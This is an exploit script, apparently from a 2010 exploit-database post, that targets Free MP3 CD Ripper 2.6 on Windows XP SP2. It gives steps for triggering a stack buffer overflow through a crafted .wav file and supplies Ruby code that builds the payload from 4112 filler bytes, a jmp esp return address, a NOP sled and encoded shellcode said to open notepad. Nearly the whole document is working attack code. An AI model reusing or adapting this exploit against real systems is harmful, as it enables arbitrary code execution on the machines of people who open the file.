# Exploit Title: Free MP3 CD Ripper 2.6 0 day
# Date: 30/03/2010
# Author: Richard leahy
# Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html
# Version: 2.6
# Tested on: Windows Xp Sp2

#to exploit this  open up the application select file -> wav converter -> wav to mp3

#use your favourite programming language and print out the contents into a text file. save the text file as a .wav
#then open up the wav file and boom.

#feel free to email me leahy_rich@hotmail.com

#code
nop = "\x90"

#imagehlp
jmp_esp = [0x76cafa32].pack('V')

#shellcode opens notepad
shellcode =
"\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +
"\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" +
"\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" +
"\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" +
"\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" +
"\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" +
"\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" +
"\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" +
"\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" +
"\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" +
"\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" +
"\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" +
"\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" +
"\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" +
"\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" +
"\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" +
"\x2a\x67\xec"

boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode
puts boom